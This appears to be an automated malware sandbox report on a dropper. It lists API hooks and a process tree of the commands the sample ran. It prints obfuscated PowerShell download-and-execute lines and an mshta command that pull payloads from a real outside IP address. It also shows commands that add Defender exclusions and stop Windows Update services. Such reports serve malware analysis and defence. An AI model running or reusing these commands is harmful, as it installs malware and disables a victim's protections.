                                                                  Dec 18, 2024 13:49:44.721278906 CET1236INData Raw: 21 96 93 db 11 2b 0f 21 a3 b8 94 f0 03 96 f1 9f 67 09 e1 3e 0c 9e 86 21 db 41 10 27 8f c1 71 84 d9 70 61 91 6f 18 a9 50 41 76 b2 ed 18 f0 46 03 c8 4c c4 85 72 2d 2c aa 71 a4 62 43 78 2e 5f 65 c4 89 a6 b4 10 8b 70 c5 15 73 23 6e d0 15 19 0d 27 6a
                                                                  Data Ascii: !+!g>!A'qpaoPAvFLr-,qbCx._eps#n'j[!@chO[K>GC#K;rC>G3#;+r3>G##+r#>G#r>I )@@K!A@Y!GGhK8x?B]!<6OAdqnC@gm8{F@<Gsd{|kGsck|[


                                                                  Code Manipulations

                                                                  User Modules

                                                                  Hook Summary

                                                                  Function NameHook TypeActive in Processes
                                                                  ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                  NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                  ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                  NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                  ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                  NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                  NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                  ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                  ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                  NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                  RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                                  NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                  NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                  ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                  ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe

                                                                  Processes

                                                                  Process: winlogon.exe, Module: ntdll.dll
                                                                  Function NameHook TypeNew Data
                                                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                  Process: explorer.exe, Module: ntdll.dll
                                                                  Function NameHook TypeNew Data
                                                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:07:49:04
                                                                  Start date:18/12/2024
                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                  Imagebase:0x920000
                                                                  File size:51'200 bytes
                                                                  MD5 hash:16B50170FDA201194A611CA41219BE7D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:07:49:05
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"wscript" C:\Users\user\AppData\Local\Temp\tempScript.js
                                                                  Imagebase:0x7ff766b80000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:07:49:06
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:07:49:06
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:07:49:06
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:07:49:06
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:07:49:11
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\CMD.vbs"
                                                                  Imagebase:0x7ff766b80000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:07:49:12
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                                  Imagebase:0x7ff71bc40000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:07:49:12
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:07:49:12
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\mshta.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:mshta http://176.113.115.178/Windows-Update
                                                                  Imagebase:0x7ff73f470000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:07:49:16
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                  Imagebase:0x7ff7403e0000
                                                                  File size:55'320 bytes
                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:07:49:16
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:16
                                                                  Start time:07:49:16
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:17
                                                                  Start time:07:49:18
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:19
                                                                  Start time:07:49:21
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff717f30000
                                                                  File size:496'640 bytes
                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:26
                                                                  Start time:07:49:56
                                                                  Start date:18/12/2024
                                                                  Path:C:\Users\user\AppData\Roaming\LB31.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Roaming\LB31.exe"
                                                                  Imagebase:0x7ff70a8a0000
                                                                  File size:7'679'488 bytes
                                                                  MD5 hash:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 63%, ReversingLabs
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:27
                                                                  Start time:07:49:57
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:28
                                                                  Start time:07:49:57
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:30
                                                                  Start time:07:50:00
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff71bc40000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:31
                                                                  Start time:07:50:00
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                  Imagebase:0x7ff6c3980000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:32
                                                                  Start time:07:50:00
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:33
                                                                  Start time:07:50:00
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:34
                                                                  Start time:07:50:01
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\wusa.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff778d90000
                                                                  File size:345'088 bytes
                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:35
                                                                  Start time:07:50:01
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                  Imagebase:0x7ff6c3980000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:36
                                                                  Start time:07:50:01
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:37
                                                                  Start time:07:50:01
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                  Imagebase:0x7ff6c3980000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:38
                                                                  Start time:07:50:01
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:39
                                                                  Start time:07:50:01
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop bits
                                                                  Imagebase:0x7ff6c3980000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:40
                                                                  Start time:07:50:01
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:41
                                                                  Start time:07:50:01
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                  Imagebase:0x7ff6c3980000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:42
                                                                  Start time:07:50:01
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:43
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                  Imagebase:0x7ff7ac670000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:44
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                  Imagebase:0x7ff7ac670000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:45
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:46
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                  Imagebase:0x7ff7ac670000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:47
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:48
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                  Imagebase:0x7ff7ac670000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:49
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\dialer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\dialer.exe
                                                                  Imagebase:0x7ff6605e0000
                                                                  File size:39'936 bytes
                                                                  MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:50
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:51
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:52
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe delete "LIB"
                                                                  Imagebase:0x7ff6c3980000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:53
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:54
                                                                  Start time:07:50:02
                                                                  Start date:18/12/2024
                                                                  Path:C:\Windows\System32\winlogon.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:winlogon.exe
                                                                  Imagebase:0x7ff70f350000
                                                                  File size:906'240 bytes
